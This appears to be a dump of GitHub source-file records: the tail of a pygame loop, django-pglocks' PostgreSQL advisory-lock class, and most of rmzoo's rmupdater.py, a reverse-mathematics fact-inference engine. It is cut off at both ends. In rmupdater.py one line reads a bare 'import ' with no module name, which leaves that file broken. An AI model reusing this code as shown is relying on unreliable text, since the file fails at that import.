range(0,len(barl)):\r\n\t\ttry:\r\n\t\t\tbarl[i].ShowBarrier()\r\n\t\texcept IndexError:\r\n\t\t\tpass\t\t\t\r\n\t\r\n\tpygame.display.flip()\r\n\tevent = pygame.event.poll()\r\n\tif pygame.key.get_pressed()[pygame.K_ESCAPE]:\r\n\t\tbreak\r\n\r\n" } ]
6
iXce/django-pglocks
https://github.com/iXce/django-pglocks
47277eefb951754eb80af24aeb85801f8c1aa7fa
d4ae655e5d136afff8377070958547dffb72f814
bdacf39ba5fae93a1dfe25e72196f91552884ccc
refs/heads/master
2020-12-25T05:29:18.668812
2016-09-17T21:12:14
2016-09-17T21:12:14
67,877,659
0
0
null
2016-09-10T15:09:05
2016-04-11T11:44:40
2016-04-11T12:02:01
null
[ { "alpha_fraction": 0.553398072719574, "alphanum_fraction": 0.5649859309196472, "avg_line_length": 30.93000030517578, "blob_id": "a3d3637e097e4f191e9122c92e30e98c2b9ed93a", "content_id": "de0ca41b5d38ab1d529b53507727f1484ac0a393", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3193, "license_type": "permissive", "max_line_length": 110, "num_lines": 100, "path": "/django_pglocks/__init__.py", "repo_name": "iXce/django-pglocks", "src_encoding": "UTF-8", "text": "from zlib import crc32\nfrom django.utils import six\n\n__version__ = '1.0.2'\n\nclass advisory_lock(object):\n\n def __init__(self, lock_id, shared=False, wait=True, using=None, connection=None):\n self.lock_id = lock_id\n self.shared = shared\n self.wait = wait\n\n # The `connection` can set to an instance of :class:`psycopg2.connection`.\n # If missing then the connection is retrieved with Django.\n\n if connection:\n assert not using\n else:\n from django.db import DEFAULT_DB_ALIAS, connections\n if using is None:\n using = DEFAULT_DB_ALIAS\n connection = connections[using]\n\n self.using = using\n self.connection = connection\n self.cursor = None\n\n # Assemble the function name based on the options.\n function_name = 'pg_'\n\n if not self.wait:\n function_name += 'try_'\n\n function_name += 'advisory_lock'\n\n if self.shared:\n function_name += '_shared'\n\n release_function_name = 'pg_advisory_unlock'\n if self.shared:\n release_function_name += '_shared'\n\n # Format up the parameters.\n\n tuple_format = False\n\n if isinstance(lock_id, (list, tuple,)):\n if len(lock_id) != 2:\n raise ValueError(\"Tuples and lists as lock IDs must have exactly two entries.\")\n\n if not isinstance(lock_id[0], six.integer_types) or not isinstance(lock_id[1], six.integer_types):\n raise ValueError(\"Both members of a tuple/list lock ID must be integers\")\n\n tuple_format = True\n elif isinstance(lock_id, six.string_types):\n # Generates an id within postgres integer range (-2^31 to 2^31 - 1).\n # crc32 generates an unsigned integer in Py3, we convert it into\n # a signed integer using 2's complement (this is a noop in Py2)\n pos = crc32(lock_id.encode(\"utf-8\"))\n lock_id = (2 ** 31 - 1) & pos\n if pos & 2 ** 31:\n lock_id -= 2 ** 31\n elif not isinstance(lock_id, six.integer_types):\n raise ValueError(\"Cannot use %s as a lock id\" % lock_id)\n\n if tuple_format:\n base = \"SELECT %s(%d, %d)\"\n params = (lock_id[0], lock_id[1],)\n else:\n base = \"SELECT %s(%d)\"\n params = (lock_id,)\n\n self.query_base = base\n self.acquire_params = (function_name, ) + params\n self.release_params = (release_function_name, ) + params\n\n def acquire(self):\n command = self.query_base % self.acquire_params\n self.cursor = self.connection.cursor()\n\n self.cursor.execute(command)\n\n if not self.wait:\n self.acquired = self.cursor.fetchone()[0]\n else:\n self.acquired = True\n return self.acquired\n\n def release(self):\n if self.acquired:\n command = self.query_base % self.release_params\n self.cursor.execute(command)\n self.acquired = False\n self.cursor.close()\n\n def __enter__(self):\n return self.acquire()\n\n def __exit__(self):\n return self.release()\n" } ]
1
TonichaC/rmzoo
https://github.com/TonichaC/rmzoo
09849bffb84da198ce99e37784d91e746b19a5cc
dedec22f017a63b58662426689bb04444076dabf
3a1751606804a73000072708144e127264d43a79
refs/heads/master
2021-01-07T08:35:50.873433
2020-02-20T13:35:29
2020-02-20T13:35:29
241,636,800
0
0
MIT
2020-02-19T14:05:20
2020-02-18T13:48:00
2018-09-07T08:20:18
null
[ { "alpha_fraction": 0.5104838013648987, "alphanum_fraction": 0.5156267881393433, "avg_line_length": 35.939456939697266, "blob_id": "0aa0d7ab9268a380a158daa5bb6d2cf136bc2975", "content_id": "960178b8199baa746f5d9acf67df94b5ea86dbd3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 35388, "license_type": "permissive", "max_line_length": 154, "num_lines": 958, "path": "/rmupdater.py", "repo_name": "TonichaC/rmzoo", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n\n##################################################################################\n#\n# The Reverse Mathematics Zoo Updater\n# by Damir Dzhafarov\n# - Version 1.0 started August, 2010\n# - Version 2.0 started August, 2013\n# Revised by Eric Astor\n# - Version 3.0 - 29 May 2016\n# - Version 4.0 - started 30 May 2016\n# - Version 4.1 - optimizations & refactoring, started 2 July 2016\n# - Version 4.2 - new forms and reasoning, started 12 July 2016\n# - Version 4.3 - changed internal representations, started 21 July 2016\n# - Version 4.4 - moved to a shelf database, started 25 July 2016\n# - Version 5.0 - clean implementation of inference rules, started 1 August 2016\n# - Version 5.1 - reverted from shelf database for cross-platform compatibility, started 16 August 2016\n# Documentation and support: http://rmzoo.uconn.edu\n#\n##################################################################################\n\nfrom __future__ import print_function\n\nimport itertools\nimport sys\nimport \n\nfrom io import open\nfrom collections import defaultdict\n\nfrom version_guard import isString, lru_cache\n\nimport zlib\ntry:\n import cPickle as pickle\nexcept:\n import pickle\n\ndef eprint(*args, **kwargs):\n print(*args, file=sys.stderr, **kwargs)\n\nDate = u'16 August 2016'\nVersion = u'5.1'\nDatabaseVersion = u'5.1'\n\nversion, versionPoint = sys.version_info[0:2]\nif version >= 3 and versionPoint >= 3:\n timekeeper = time.perf_counter\nelse:\n timekeeper = time.clock\n\nfrom rmBitmasks import *\nfrom renderJustification import *\n\nRCAprinciple = u'RCA'\n\nprinciplesList = [RCAprinciple]\nprinciples = set(principlesList)\n\ndef addPrinciple(a):\n setA = set(a.split(u'+'))\n a = u'+'.join(sorted(setA))\n principles.add(a)\n principles.update(setA)\n return a\n\nconjunction = {}\ndef joinPrinciples(a, b):\n try:\n return conjunction[a,b]\n except KeyError:\n p = u'+'.join(sorted(set(a.split(u'+')) | set(b.split(u'+'))))\n if p not in principles:\n p = None\n conjunction[a,b] = p\n conjunction[b,a] = p\n return p\n\nequivalent = defaultdict(noReduction)\nimplies = defaultdict(noReduction)\nnotImplies = defaultdict(noReduction)\n\ndef addEquivalent(a,reduction,b):\n equivalent[a,b] |= Reduction.weaker(reduction)\n\ndef addReduction(a,reduction,b):\n implies[a,b] |= Reduction.weaker(reduction)\n\ndef addNonReduction(a,reduction,b):\n notImplies[a,b] |= Reduction.stronger(reduction)\n\nconservative = defaultdict(noForm)\nnonConservative = defaultdict(noForm)\n\ndef addConservative(a,frm,b):\n conservative[a,b] |= Form.stronger(frm)\n\ndef addNonConservative(a,frm,b):\n nonConservative[a,b] |= Form.weaker(frm)\n\nform = defaultdict(noForm)\n\nprimary = set()\nprimaryIndex = []\n\ndef addForm(a, frm):\n form[a] |= Form.weaker(frm)\n\ndef addPrimary(a):\n primary.add(a)\n primaryIndex.append(a)\n\njustify = {}\njustComplexity = {}\n\ndef updateJustification(fact, jst, cplx):\n try:\n if cplx >= justComplexity[fact]:\n return False\n except KeyError:\n pass\n justify[fact] = jst\n justComplexity[fact] = cplx\n return True\n\ndef unoptimizedJustification(fact, jst, cplx):\n if fact in justify:\n return False\n else:\n justify[fact] = jst\n return True\n\nclass UnjustifiedFactError(Exception):\n def __init__(self, a, op, b):\n super(UnjustifiedFactError, self).__init__(u'The fact \"{0}\" is not justified.'.format(printFact(a, op, b)))\n\ndef addUnjustified(a, op, b):\n raise UnjustifiedFactError(a, op, b)\n\nclass ContradictionError(Exception):\n def __init__(self, fact1, fact2):\n super(ContradictionError, self).__init__(u'The following facts are contradictory:\\n\\n' +\n printJustification(fact1, justify) + u'\\n\\n' +\n printJustification(fact2, justify))\n\n# Noted side-effects:\n# Changing '<->' can affect '->'\n# Changing '->' can affect 'c' and '<->'\n# Changing 'c' can affect '->'\n# Changing '-|>' can affect 'nc'\n# Changing 'nc' can affect '-|>'\ndef addFact(a, op, b, jst, cplx):\n fact = (a, op, b)\n if not updateJustification(fact, jst, cplx):\n return False\n opCtx,opCore = op\n \n ref = (fact,)\n refCplx = 1 + cplx\n \n if opCore == u'<->': # equivalence\n # Symmetry:\n # IF (a X<-> b), THEN (b X<-> a).\n updateJustification((b, op, a), jst, cplx)\n \n for x in Reduction.list(Reduction.weaker(opCtx)):\n newOp = (x, u'<->')\n \n addEquivalent(a, x, b)\n updateJustification((a, newOp, b), ref, refCplx)\n \n # Symmetry:\n # IF (a X<-> b), THEN (b X<-> a).\n addEquivalent(b, x, a)\n updateJustification((b, newOp, a), ref, refCplx)\n \n # Definition of equivalence:\n # IF (a X<-> b), THEN (a X-> b) AND (b X-> a).\n impliesOp = (opCtx, u'->')\n addFact(a, impliesOp, b, (fact,), refCplx)\n addFact(b, impliesOp, a, (fact,), refCplx)\n elif opCore == u'->': # implication\n for x in Reduction.list(Reduction.weaker(opCtx)):\n addReduction(a, x, b)\n updateJustification((a, (x, u'->'), b), ref, refCplx)\n \n if Reduction.isPresent(x, notImplies[a,b]):\n raise ContradictionError((a, (x, u'->'), b), (a, (x, u'-|>'), b))\n \n if x == Reduction.RCA:\n if x == opCtx:\n newRef = ref\n newRefCplx = refCplx\n else:\n newRef = ((a, (x, u'->'), b),)\n newRefCplx = 1 + refCplx\n \n # Trivial conservation:\n # IF (a RCA-> b), THEN (b Fc a).\n for f in Form:\n if f != Form.none:\n addFact(b, (f, u'c'), a, newRef, newRefCplx)\n \n # Definition of conjunction (special case):\n # IF (a X-> b), THEN (a X<-> a+b).\n ab = joinPrinciples(a,b)\n if ab is not None:\n addFact(a, (opCtx, u'<->'), ab, ref, refCplx)\n elif opCore == u'-|>': # non-implication\n for x in Reduction.list(Reduction.stronger(opCtx)):\n addNonReduction(a, x, b)\n updateJustification((a, (x, u'-|>'), b), ref, refCplx)\n \n if Reduction.isPresent(x, implies[a,b]):\n raise ContradictionError((a, (x, u'-|>'), b), (a, (x, u'->'), b))\n \n if x == Reduction.RCA:\n if x == opCtx:\n newFact = fact\n newCplx = 1 + refCplx\n else:\n newFact = (a, (x, u'-|>'), b)\n newCplx = 2 + refCplx\n \n # Definition of non-conservation (special case):\n # IF (a RCA-|> b) AND (b form F), THEN (b nFc a).\n for f in Form.list(form[b]):\n addFact(b, (f, u'nc'), a, (newFact, (b, u'form', f)), newCplx)\n elif opCore == u'c': # conservation\n for f in Form.list(Form.stronger(opCtx)):\n newFact = (a, (f, u'c'), b)\n \n addConservative(a, f, b)\n updateJustification(newFact, ref, refCplx)\n \n if Form.isPresent(f, nonConservative[a,b]):\n raise ContradictionError((a, (f, u'c'), b), (a, (f, u'nc'), b))\n \n # Definition of conservation (special case):\n # IF (a Fc b) AND (a form F), THEN (b RCA-> a).\n if Form.isPresent(f, form[a]):\n if f == opCtx:\n newCplx = 1 + refCplx\n else:\n newCplx = 2 + refCplx\n \n addFact(b, (Reduction.RCA, u'->'), a, (newFact, (a, u'form', f)), newCplx)\n elif opCore == u'nc': # non-conservation\n for f in Form.list(Form.weaker(opCtx)):\n addNonConservative(a, f, b)\n updateJustification((a, (f, u'nc'), b), ref, refCplx)\n \n if Form.isPresent(f, conservative[a,b]):\n raise ContradictionError((a, (f, u'nc'), b), (a, (f, u'c'), b))\n \n # Trivial conservation (contrapositive):\n # IF (a nFc b), THEN (b RCA-|> a).\n addFact(b, (Reduction.RCA, u'-|>'), a, ref, refCplx)\n else:\n raise ValueError(u'Unrecognized operator: ' + opCore)\n \n return True\n\ndef standardizePrinciple(a):\n return u'+'.join(sorted(set(a.split(u'+'))))\ndef standardizeFact(a, op, b):\n a = standardizePrinciple(a)\n if op != u'form':\n b = standardizePrinciple(b)\n if op[1] == u'<=':\n op = (op[0], u'->')\n a,b = b,a\n elif op[1] == u'</=':\n op = (op[0], u'-|>')\n a,b = b,a\n return a, op, b\n\nfrom pyparsing import *\ndef parseResults(resultsString, quiet=False):\n start = timekeeper()\n if not quiet: eprint(u'Parsing results...')\n # Name parsed strings\n name = Word( alphas+\"_+^{}\\\\$\", alphanums+\"_+^{}$\\\\\").setParseAction(lambda s,l,t: addPrinciple(t[0]))\n \n parenth = Literal('\"')\n justification = QuotedString('\"\"\"',multiline=True) | quotedString.setParseAction(removeQuotes)\n \n _reductionName = NoMatch()\n for r in Reduction:\n if r != Reduction.none:\n _reductionName |= Literal(r.name)\n for r in Reduction.alias:\n if r != u'':\n _reductionName |= Literal(r)\n _reductionType = _reductionName.setParseAction(lambda s,l,t: [Reduction.fromString(t[0])])\n reductionType = Optional(_reductionType, default=Reduction.RCA)\n postfixReductionType = Optional(Suppress(Literal(\"_\")) + _reductionType, default=Reduction.RCA)\n \n implication = (reductionType + Literal(\"->\")) | (Literal(\"=>\") + postfixReductionType).setParseAction(lambda s,l,t: [t[1], \"->\"])\n nonImplication = (reductionType + Literal(\"-|>\")) | (Literal(\"=/>\") + postfixReductionType).setParseAction(lambda s,l,t: [t[1], \"-|>\"])\n equivalence = (reductionType + Literal(\"<->\")) | (Literal(\"<=>\") + postfixReductionType).setParseAction(lambda s,l,t: [t[1], \"<->\"])\n \n reduction = (Literal(\"<=\") + postfixReductionType).setParseAction(lambda s,l,t: [t[1], \"<=\"])\n nonReduction = (Literal(\"</=\") + postfixReductionType).setParseAction(lambda s,l,t: [t[1], \"</=\"])\n \n _formName = NoMatch()\n for f in Form:\n if f != Form.none:\n _formName |= Literal(f.name)\n formType = _formName.setParseAction(lambda s,l,t: [Form.fromString(t[0])])\n \n conservation = formType + Literal(\"c\")\n nonConservation = (Literal(\"n\") + formType + Literal(\"c\")).setParseAction(lambda s,l,t: [t[1], \"nc\"])\n \n operator = implication | nonImplication | reduction | nonReduction | equivalence | conservation | nonConservation\n \n # Results file lines\n unjustified = (name + Group(operator) + name + ~justification).setParseAction(lambda s,l,t: addUnjustified(*standardizeFact(t[0], tuple(t[1]), t[2])))\n \n factsToAdd = []\n def _addFactParseAction(s,l,t):\n a,op,b = standardizeFact(t[0], tuple(t[1]), t[2])\n factsToAdd.append(((a, op, b), t[3]))\n fact = (name + Group(operator) + name + justification).setParseAction(_addFactParseAction)\n\n formDef = (name + Literal(\"form\") + formType).setParseAction(lambda s,l,t: addForm(t[0], t[2]))\n primary = (name + Literal(\"is primary\")).setParseAction(lambda s,l,t: addPrimary(t[0]))\n \n comments = Suppress(Literal( \"#\" ) + SkipTo(LineEnd()))\n \n # Represent and parse results file\n entry = fact | formDef | primary | unjustified | comments\n results = ZeroOrMore( entry ) + StringEnd()\n \n results.parseString(resultsString)\n \n global principlesList\n principlesList = sorted(principles)\n \n for (a, op, b), jst in factsToAdd:\n addFact(a, op, b, jst, 1)\n \n if not quiet: eprint(u'Principles found: {0:,d}'.format(len(principlesList)))\n if not quiet: eprint(u'Elapsed: {0:.6f} s\\n'.format(timekeeper() - start))\n\n# General fact; uses nothing, affects '<->', '->', and 'c'\ndef addReflexivities():\n for a in principlesList:\n for x in Reduction:\n if x == Reduction.none: continue\n \n # (a X-> a)\n addFact(a, (x, u'<->'), a, u'reflexivity', 1)\n \n # (a X<-> a)\n addFact(a, (x, u'->'), a, u'reflexivity', 1)\n \n for f in Form:\n if f == Form.none: continue\n \n # (a Fc a)\n addFact(a, (f, u'c'), a, u'reflexivity', 1)\n\n# General fact; uses nothing, affects '->'\ndef addRCABottom():\n # (a X-> RCA)\n for a in principlesList:\n for x in Reduction:\n if x == Reduction.none: continue\n \n addFact(a, (x, u'->'), RCAprinciple, u'', 1)\n\n# General fact; uses nothing, affects '->'\ndef definitionOfConjunction():\n # IF (a == b+...), THEN (a X-> b).\n for a in principlesList:\n splitA = set(a.split(u'+'))\n if len(splitA) == 1: continue\n \n for b in principlesList:\n if b == a: continue\n \n splitB = set(b.split(u'+'))\n if splitB <= splitA:\n for x in Reduction:\n if x == Reduction.none: continue\n \n addFact(a, (x, u'->'), b, u'', 1)\n\n# Uses '->', affects '<->'\ndef definitionOfEquivalence():\n #a X<-> b\n #WHEN\n # (a X-> b) AND (b X-> a)\n \n r = False\n for a,b in itertools.combinations(principlesList, 2):\n equiv = implies[a,b] & implies[b,a]\n \n if equiv != Reduction.none:\n for x in Reduction.list(equiv):\n imp = (x, u'->')\n aImpB = (a, imp, b)\n bImpA = (b, imp, a)\n \n r |= addFact(a, (x, u'<->'), b,\n (aImpB, bImpA), 1 + justComplexity[aImpB] + justComplexity[bImpA])\n return r\n\n# Uses array, affects array\ndef transitiveClosure(array, opName, clsCtx):\n # Complete (current) transitive closure of array, using Floyd-Warshall\n \n r = False\n for c in principlesList:\n for a in principlesList:\n if a == c: continue\n \n acRelation = array[a,c]\n if acRelation == clsCtx.none: continue\n \n for b in principlesList:\n if b == a or b == c: continue\n \n transitive = acRelation & array[c,b]\n if transitive == clsCtx.none: continue\n \n for x in clsCtx.list(transitive):\n op = (x, opName)\n aOpC = (a, op, c)\n cOpB = (c, op, b)\n \n r |= addFact(a, op, b,\n (aOpC, cOpB), 1 + justComplexity[aOpC] + justComplexity[cOpB])\n return r\n\n# Uses '->', affects '->'\ndef unifyOverConjunctions():\n #a X-> b\n #WHEN\n # (b == c+d) AND (a X-> c) AND (a X-> d) \"Definition of conjunction\"\n \n r = False\n for b in principlesList:\n splitB = b.split(u'+')\n if len(splitB) == 1: continue # b is not a conjunction\n \n for a in principlesList:\n aImpliesAll = ~Reduction.none\n for p in splitB:\n aImpliesAll &= implies[a,p]\n if aImpliesAll == Reduction.none: continue\n \n for x in Reduction.list(aImpliesAll):\n aImpConjuncts = tuple([(a, (x, u'->'), t) for t in splitB])\n r |= addFact(a, (x, u'->'), b,\n aImpConjuncts, 1 + sum(justComplexity[aImpX] for aImpX in aImpConjuncts))\n return r\n\n#REDUNDANT\n# Uses 'c' and '->', affects '->'\ndef definitionOfConservation():\n #a RCA-> b\n #WHEN\n # (c Fc a) AND (c RCA-> b) AND (b has form F) \"Definition of conservation\"\n \n r = False\n for c in principlesList:\n for b in principlesList:\n if b == c: continue\n \n if Reduction.isPresent(Reduction.RCA, implies[c,b]):\n formB = form[b]\n if formB == Form.none: continue\n \n cImpB = (c, (Reduction.RCA, u'->'), b)\n refCplxCB = 2 + justComplexity[cImpB]\n \n for a in principlesList:\n if a == b or a == c: continue\n \n frms = formB & conservative[c,a]\n if frms == Form.none: continue\n \n for f in Form.list(frms):\n cConsA = (c, (f, u'c'), a)\n \n r |= addFact(a, (Reduction.RCA, u'->'), b,\n (cConsA, cImpB, (b, u'form', f)), refCplxCB + justComplexity[cConsA])\n return r\n\n# Uses posArray and negArray, affects negArray\ndef contrapositiveTransitivity(posArray, posOpName, negArray, negOpName, clsCtx):\n r = False\n for c in principlesList:\n for a in principlesList:\n if a == c: continue\n \n #a nop b\n #WHEN\n # (c op a) AND (c nop b)\n caRelation = posArray[c,a]\n if caRelation != clsCtx.none:\n for b in principlesList:\n if b == a or b == c: continue\n \n contexts = caRelation & negArray[c,b]\n if contexts == clsCtx.none: continue\n \n for ctx in clsCtx.list(contexts):\n nop = (ctx, negOpName)\n \n cOpA = (c, (ctx, posOpName), a)\n cNOpB = (c, nop, b)\n \n r |= addFact(a, nop, b,\n (cOpA, cNOpB), 1 + justComplexity[cOpA] + justComplexity[cNOpB])\n \n #a nop b\n #WHEN\n # (a nop c) AND (b op c)\n acNRelation = negArray[a,c]\n if acNRelation != clsCtx.none:\n for b in principlesList:\n if b == a or b == c: continue\n \n contexts = acNRelation & posArray[b,c]\n if contexts == clsCtx.none: continue\n \n for ctx in clsCtx.list(contexts):\n nop = (ctx, negOpName)\n \n aNOpC = (a, nop, c)\n bOpC = (b, (ctx, posOpName), c)\n \n r |= addFact(a, nop, b,\n (aNOpC, bOpC), 1 + justComplexity[aNOpC] + justComplexity[bOpC])\n return r\n\n# Uses '->' and '-|>', affects '-|>'\ndef contrapositiveConjunction():\n #a X-|> b\n #WHEN\n # (a X-> c) AND (a X-|> b+c)\n \n r = False\n for c in principlesList:\n for b in principlesList:\n if b == c: continue\n \n bc = joinPrinciples(b,c)\n if bc is None: continue\n \n for a in principlesList:\n if a == b: continue\n \n if a == c: # Special-case\n reds = notImplies[a,bc]\n if reds == Reduction.none: continue\n \n for x in Reduction.list(reds):\n notImp = (x, u'-|>')\n \n aNotImpBC = (a, notImp, bc)\n \n r |= addFact(a, notImp, b,\n (aNotImpBC,), 1 + justComplexity[aNotImpBC])\n else:\n reds = implies[a,c] & notImplies[a,bc]\n if reds == Reduction.none: continue\n \n for x in Reduction.list(reds):\n notImp = (x, u'-|>')\n \n aImpC = (a, (x, u'->'), c)\n aNotImpBC = (a, notImp, bc)\n \n r |= addFact(a, notImp, b,\n (aImpC, aNotImpBC), 1 + justComplexity[aImpC] + justComplexity[aNotImpBC])\n return r\n\n#REDUNDANT\n# Uses 'c' and '-|>', affects '-|>'\ndef contrapositiveConservation(): \n #a RCA-|> b\n #WHEN\n # (a Fc c) AND (c RCA-|> b) AND (b has form F)\n notImp = (Reduction.RCA, u'-|>')\n \n r = False\n for c in principlesList:\n for b in principlesList:\n if b == c: continue\n \n if Reduction.isPresent(Reduction.RCA, notImplies[c,b]):\n formB = form[b]\n if formB == Form.none: continue\n \n cNotImpB = (c, notImp, b)\n refCplxCB = 2 + justComplexity[cNotImpB]\n \n for a in principlesList:\n if a == b or a == c: continue\n \n frms = conservative[a,c] & formB\n if frms == Form.none: continue\n \n for f in Form.list(frms):\n aConsC = (a, (f, u'c'), c)\n \n r |= addFact(a, notImp, b,\n (aConsC, cNotImpB, (b, u'form', f)), justComplexity[aConsC] + refCplxCB)\n return r\n\n#REDUNDANT\n# Uses 'c' and '->', affects 'c'\ndef liftConservation():\n r = False\n for c in principlesList:\n #a Fc b\n #WHEN\n # (c RCA-> a) AND (c Fc b) [aka \"Weaker principles prove less\"]\n for a in principlesList:\n if a == c: continue\n \n if Reduction.isPresent(Reduction.RCA, implies[c,a]):\n cImpA = (c, (Reduction.RCA, u'->'), a)\n refCplxCA = 1 + justComplexity[cImpA]\n \n for b in principlesList:\n if b == a or b == c: continue\n \n for f in Form.list(conservative[c,b]):\n fc = (f, u'c')\n cConsB = (c, fc, b)\n \n r |= addFact(a, fc, b,\n (cImpA, cConsB), refCplxCA + justComplexity[cConsB])\n \n #a Fc b\n #WHEN\n # (a Fc c) AND (b RCA-> c) [aka \"Stronger principles prove more\"]\n for b in principlesList:\n if b == c: continue\n \n if Reduction.isPresent(Reduction.RCA, implies[b,c]):\n bImpC = (b, (Reduction.RCA, u'->'), c)\n refCplxBC = 1 + justComplexity[bImpC]\n \n for a in principlesList:\n if a == b or a == c: continue\n \n for f in Form.list(conservative[a,c]):\n fc = (f, u'c')\n aConsC = (a, fc, c)\n \n r |= addFact(a, fc, b,\n (aConsC, bImpC), justComplexity[aConsC] + refCplxBC)\n return r\n\n#REDUNDANT\n# Uses '->' and '-|>', affects 'nc'\ndef definitionOfNonConservation():\n #a nFc b\n #WHEN\n # (a RCA-> c) AND (b RCA-|> c) AND (c has form F)\n r = False\n for c in principlesList:\n formC = form[c]\n if formC == Form.none: continue\n cForms = Form.list(formC)\n \n for a in principlesList:\n if a == c: continue\n \n if Reduction.isPresent(Reduction.RCA, implies[a,c]):\n aImpC = (a, (Reduction.RCA, u'->'), c)\n refCplxAC = 2 + justComplexity[aImpC]\n \n for b in principlesList:\n if b == a or b == c: continue\n \n if Reduction.isPresent(Reduction.RCA, notImplies[b,c]):\n bNotImpC = (b, (Reduction.RCA, u'-|>'), c)\n \n cplx = refCplxAC + justComplexity[bNotImpC]\n \n for f in cForms:\n r |= addFact(a, (f, u'nc'), b,\n (aImpC, bNotImpC, (c, u'form', f)), cplx)\n return r\n\n#REDUNDANT\n# Uses 'nc' and '->', affects 'nc'\ndef liftNonConservation():\n imp = (Reduction.RCA, u'->')\n \n r = False\n for c in principlesList:\n #a nFc b\n #WHEN\n # (a nFc c) AND (c RCA-> b) [aka \"Weaker principles prove less (contrapositive)\"]\n for b in principlesList:\n if b == c: continue\n \n if Reduction.isPresent(Reduction.RCA, implies[c,b]):\n cImpB = (c, imp, b)\n refCplxCB = 1 + justComplexity[cImpB]\n \n for a in principlesList:\n if a == b or a == c: continue\n \n for f in Form.list(nonConservative[a,c]):\n nFc = (f, u'nc')\n aNonConsC = (a, nFc, c)\n \n r |= addFact(a, nFc, b,\n (aNonConsC, cImpB), justComplexity[aNonConsC] + refCplxCB)\n \n #a nFc b\n #WHEN\n # (a RCA-> c) AND (c nFc b) [aka \"Stronger principles prove more (contrapositive)\"]\n for a in principlesList:\n if a == c: continue\n \n if Reduction.isPresent(Reduction.RCA, implies[a,c]):\n aImpC = (a, imp, c)\n refCplxAC = 1 + justComplexity[aImpC]\n \n for b in principlesList:\n if b == a or b == c: continue\n \n for f in Form.list(nonConservative[c,b]):\n nFc = (f, u'nc')\n cNonConsB = (c, (f, u'nc'), b)\n \n r |= addFact(a, nFc, b,\n (aImpC, cNonConsB), refCplxAC + justComplexity[cNonConsB])\n return r\n\ndef deriveInferences(quiet=False, verbose=False):\n start = timekeeper()\n if not quiet: eprint(u'Adding reflexivity facts..')\n addReflexivities()\n if not quiet: eprint(u'Making RCA trivial..')\n addRCABottom()\n if not quiet: eprint(u'Recording conjunctions...')\n definitionOfConjunction()\n if not quiet: eprint(u'Elapsed: {0:.6f} s\\n'.format(timekeeper() - start))\n \n start = timekeeper()\n if not quiet: eprint(u'Deriving positive facts:')\n n = 0\n eUpdated, iUpdated, cUpdated = True, True, True\n while eUpdated or iUpdated or cUpdated:\n n += 1\n eChanged, iChanged, cChanged = False, False, False\n \n if iUpdated or iChanged:\n if not quiet: eprint(u'\\tExtracting equivalences...')\n eChanged |= definitionOfEquivalence() # Uses '->', affects '<->'\n if eUpdated or eChanged:\n if not quiet: eprint(u'\\tTaking the transitive closure of equivalence...')\n eChanged |= transitiveClosure(equivalent, u'<->', Reduction) # Uses '<->', affects '<->'\n \n if iUpdated or iChanged:\n if not quiet: eprint(u'\\tTaking the transitive closure of implication...')\n iChanged |= transitiveClosure(implies, u'->', Reduction) # Uses '->', affects '->'\n if not quiet: eprint(u'\\tReverse-engineering implications of conjunctions...')\n iChanged |= unifyOverConjunctions() # Uses '->', affects '->'\n if (cUpdated or cChanged) or (iUpdated or iChanged):\n if not quiet: eprint(u'\\tImplementing conservativity for implication...')\n iChanged |= definitionOfConservation() # Uses 'c' and '->', affects '->'\n \n if cUpdated or cChanged:\n if not quiet: eprint(u'\\tTaking the transitive closure of conservation facts...')\n cChanged |= transitiveClosure(conservative, u'c', Form) # Uses 'c', affects 'c'\n if (cUpdated or cChanged) or (iUpdated or iChanged):\n if not quiet: eprint(u'\\tLifting conservation facts over implications...')\n cChanged |= liftConservation() # Uses 'c' and '->', affects 'c'\n \n if verbose:\n eprint(u'\\t\\tDuring iteration {0}:'.format(n))\n if eChanged: eprint(u'\\t\\t\\tEquivalences updated.')\n if iChanged: eprint(u'\\t\\t\\tImplications updated.')\n if cChanged: eprint(u'\\t\\t\\tConservation facts updated.')\n if not eChanged and not iChanged and not cChanged: eprint(u'\\t\\t\\tNothing updated.')\n \n eUpdated = eChanged\n iUpdated = iChanged\n cUpdated = cChanged\n if not quiet:\n eprint(u'Finished with positive facts.')\n eprint(u'Elapsed: {0:.6f} s (with {1} repeats)\\n'.format(timekeeper() - start, n))\n \n start = timekeeper()\n if not quiet: eprint(u'Deriving negative facts:')\n n = 0\n niUpdated, ncUpdated = True, True\n while niUpdated or ncUpdated:\n n += 1\n niChanged, ncChanged = False, False\n \n if niUpdated or niChanged:\n if not quiet: eprint(u'\\tApplying transivitity to non-implications...')\n niChanged |= contrapositiveTransitivity(implies, u'->', notImplies, u'-|>', Reduction) # Uses '->' and '-|>', affects '-|>'\n if not quiet: eprint(u'\\tSplitting non-implications over conjunctions...')\n niChanged |= contrapositiveConjunction() # Uses '->' and '-|>', affects '-|>'\n if not quiet: eprint(u'\\tImplementing conservativity for non-implication...')\n niChanged |= contrapositiveConservation() # Uses 'c' and '-|>', affects '-|>'\n \n if ncUpdated or ncChanged:\n if not quiet: eprint(u'\\tApplying transivitity to non-conservation facts...')\n ncChanged |= contrapositiveTransitivity(conservative, u'c', nonConservative, u'nc', Form) # Uses 'c' and 'nc', affects 'nc'\n if niUpdated or niChanged:\n if not quiet: eprint(u'\\tExtracting non-conservation facts from non-implications...')\n ncChanged |= definitionOfNonConservation() # Uses '->' and '-|>', affects 'nc'\n if ncUpdated or ncChanged:\n if not quiet: eprint(u'\\tLifting non-conservation facts over implications...')\n ncChanged |= liftNonConservation() # Uses 'nc' and '->', affects 'nc'\n \n if verbose:\n eprint(u'\\t\\tDuring iteration {0}:'.format(n))\n if niChanged: eprint(u'\\t\\t\\tNon-implications updated.')\n if ncChanged: eprint(u'\\t\\t\\tNon-conservation facts updated.')\n if not niChanged and not ncChanged: eprint(u'\\t\\t\\tNothing updated.')\n \n niUpdated = niChanged\n ncUpdated = ncChanged\n if not quiet:\n eprint(u'Finished with negative facts.')\n eprint(u'Elapsed: {0:.6f} s (with {1} repeats)\\n'.format(timekeeper() - start, n))\n\ndef getDatabase():\n return {'version': DatabaseVersion,\n 'principles': principles,\n 'implication': (implies, notImplies),\n 'conservation': (conservative, nonConservative),\n 'form': form,\n 'primary': (primary, primaryIndex),\n 'justify': justify}\n\ndef setDatabase(database):\n if database['version'] != DatabaseVersion:\n raise VersionError(database['version'], DatabaseVersion)\n \n global principles, principlesList\n principles = database['principles']\n principlesList = sorted(principles)\n \n global implies, 